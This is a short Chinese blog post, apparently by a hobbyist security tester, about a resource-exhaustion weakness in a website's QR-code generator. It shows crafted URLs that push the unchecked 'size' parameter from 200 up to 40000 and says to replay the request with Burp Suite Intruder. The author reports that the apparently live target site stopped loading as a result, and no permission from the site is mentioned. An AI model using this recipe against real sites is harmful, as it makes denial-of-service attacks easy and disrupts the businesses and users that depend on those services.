来看这个URL:
https://www.xxx.com/normal/download/qrcode?size=200&convert=https://www.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1
注意这个参数:size=200,可以看到下面服务器访问速度是76ms,图片是948B说明很快,那么我们把200改成10000
构造URL:
https://www.xxx.com/normal/download/qrcode?size=10000&convert=https://wx.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1
改成10000的时候服务器响应速度是1.55s,图片字节是161KB了,那么我们继续改,改成38000
构造URL:
https://www.xxx.com/normal/download/qrcode?size=38000&convert=https://wx.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1
这时候响应速度是15.90s,图片字节变成了1.6MB!说明验证码大小可控!
接着打开BurpSuite抓包:访问40000
构造URL:
https://www.xxx.com/normal/download/qrcode?size=40000&convert=https://wx.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1
接着吧数据包发送到Intruder:(爆破40000后四位的参数,让BurpSuite访问)
最后访问它的域名:
https://www.xxx.com/
我这边网站一直在加载中!打不开!具体我没敢吧参数调大,怕吧网站整蹦了影响他们的业务….
By:Power_Liu
Qq:211124332
最后编辑于 :
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
